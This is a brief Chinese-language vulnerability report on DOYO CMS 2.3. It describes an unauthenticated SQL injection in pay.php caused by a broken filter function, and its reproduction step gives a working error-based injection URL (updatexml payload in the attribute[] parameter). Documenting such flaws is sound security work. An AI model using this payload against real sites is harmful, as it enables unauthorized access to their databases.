漏洞描述

DOYO 2.3中pay.php存在sql漏洞,无需admin用户登录.与之前的注入漏洞相比,此漏洞危害更大,因为无需登录管理账号即可触发。
 
 

影响版本

DOYO 2.3
 
 

漏洞分析

cms过滤函数语法错误,导致 pay.php中数组的过滤不生效:




 
 

漏洞复现

http://192.168.0.105/?c=pay&a=cartadd&id=1&quantity=1&attribute[]=123123' or updatexml(2,concat(0x7e,(version())),0) or'